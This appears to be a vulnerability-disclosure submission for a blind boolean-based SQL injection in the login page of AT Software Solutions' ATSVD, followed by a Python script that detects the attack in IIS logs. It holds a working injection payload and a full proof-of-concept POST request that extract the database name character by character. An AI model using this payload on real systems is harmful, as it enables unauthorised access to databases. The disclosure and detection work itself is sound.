Submit #504099: AT Software Solutions ATSVD < 3.4.2 Blind Boolean-Based SQL Injection

Title: AT Software Solutions ATSVD < 3.4.2 Blind Boolean-Based SQL Injection
Description: Blind Boolean-Based SQL Injection in ATSVD < 3.4.2

Vendor: AT Software Solutions // https://atgroup.com.br
Affected Product: ATSVD
Affected Versions: < 3.4.2
Vulnerability Type: Blind Boolean-Based SQL Injection
CVSS Score: 7.5

Summary: A Blind Boolean-Based SQL Injection vulnerability has been identified in the ATSVD system by AT Software Solutions, affecting versions < 3.4.2. The vulnerability exists in the txtUsuario parameter of the following endpoint:

/login.aspx

An attacker can exploit this vulnerability to infer database information using Boolean-based SQL Injection techniques.

Exploitation: The vulnerability can be exploited using the following payload:

','',''),'','')+AND+(CASE+WHEN+(SUBSTRING(DB_NAME(),X,1)='Y')+THEN+1/0+ELSE+0+END=1)--

If the query is correct, the response code is 500. If not, the response code is 200. This allows an attacker to extract database information one character at a time; it is only necessary to change the argument X to the database name index and Y to the character.

POC:

POST /login.aspx HTTP/1.1
Host: X.X.X.X
Content-Length: 703
Cache-Control: max-age=0
Accept-Language: pt-BR,pt;q=0.9
Origin: X.X.X.X
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: X.X.X.X
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=CwXEZS6e9WikUP9ry0D0Ai6IXyc5FQy%2Bp70gKogn1yXPv1C%2B0DJ7G6nki8BxXdec%2FfrzwtM47AGtO5FhZy4irSHWszG%2BJTmAifb%2FRTct%2BzIqGD42q3uBocgMqwDqTD2ExM32JTXxH3UBjABslyoLT1tR8hie%2BLIvjH4zNC1wdXSXU%2BY%2FIjXC%2BQPTaFMKND%2Bz%2FXVYTNs7%2FjlBqHdI%2FFYtLw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=Pu6msOCh%2FFHVq9R1ekhLKxkng9hxVOuBWnW6Eaqq4C20cfN2TwKXHiC9XA%2F%2BJ19DObWFq0gerKIls54eAPAD0484o1WL4l%2BxryAM5ZtcgpH34ckmR4ZOgj0h0Eozznntd61o87ogODWBPLS13AJK7yWk8oxj5Nip3kbSq5eyPdsW97ld7n666XUGHwyNwUuvT6%2FWKpXMrhqXGcqHmmLq9Q%3D%3D&txtUsuario=','',''),'','')+AND+(CASE+WHEN+(SUBSTRING(DB_NAME(),1,1)='a')+THEN+1/0+ELSE+0+END=1)--&txtSenha=a&cmdLogin=Login&txtCPF=

Impact: No authentication or privileges are required. The attack can be performed remotely. The attacker can infer database schema details, potentially leading to further exploitation.

By Yago Martins
Source: https://github.com/yago3008/cves
User: y4g0 (UID 80480)
Submission: 02/20/2025 01:12 AM (4 months ago)
Moderation: 03/01/2025 08:53 AM (9 days later)
Status: Accepted
VulDB Entry: 298069 [AT Software Solutions ATSVD up to 3.4.1 Login Endpoint /login.aspx txtUsuario sql injection]
Points: 20
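
Detection example (added here; not part of the submission or of the vendor's code): the payload travels in the POST body, which IIS W3C logs do not record, so what remains visible to a defender is the 500/200 response pattern on POST /login.aspx described above. The sketch below scans W3C-format log lines for clients producing that mix in a short window. The log excerpt is constructed, and the window and thresholds are assumptions to tune per site.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed IIS W3C excerpt (documentation IPs, not real traffic)."""
    rows = ["#Fields: date time cs-method cs-uri-stem c-ip sc-status"]
    # Client A: fast mix of 500 and 200 on the login POST (oracle-like).
    for i, status in enumerate("200 200 500 200 200 500 200 500 200 200".split()):
        rows.append(f"2025-01-01 10:00:{2 * i:02d} POST /login.aspx 198.51.100.7 {status}")
    # Client B: ordinary user, two failed logins and then a redirect.
    for i, status in enumerate(["200", "200", "302"]):
        rows.append(f"2025-01-01 10:0{i}:30 POST /login.aspx 203.0.113.9 {status}")
    # Client C: one isolated server error.
    rows.append("2025-01-01 10:05:00 POST /login.aspx 192.0.2.44 500")
    return "\n".join(rows)


def parse_w3c(text):
    """Yield one dict per request, named by the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_oracle_clients(text, path="/login.aspx", window=timedelta(seconds=60),
                        min_requests=8, min_each=3):  # thresholds are assumptions
    """Return {client_ip: (requests, errors)} for the busiest flagged window."""
    recent = defaultdict(deque)  # client -> (timestamp, status) pairs in window
    flagged = {}
    for row in parse_w3c(text):
        if row["cs-method"] != "POST" or row["cs-uri-stem"].lower() != path:
            continue
        ts = datetime.strptime(f'{row["date"]} {row["time"]}', "%Y-%m-%d %H:%M:%S")
        q = recent[row["c-ip"]]
        q.append((ts, row["sc-status"]))
        while ts - q[0][0] > window:
            q.popleft()
        errors = sum(status == "500" for _, status in q)
        oks = sum(status == "200" for _, status in q)
        # An oracle needs both outcomes; a lone 500 or plain guessing does not match.
        if len(q) >= min_requests and errors >= min_each and oks >= min_each:
            flagged[row["c-ip"]] = max(flagged.get(row["c-ip"], (0, 0)), (len(q), errors))
    return flagged


if __name__ == "__main__":
    print(find_oracle_clients(build_sample_log()))
```

On the constructed sample only 198.51.100.7 is reported; the ordinary user and the single isolated 500 are not.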
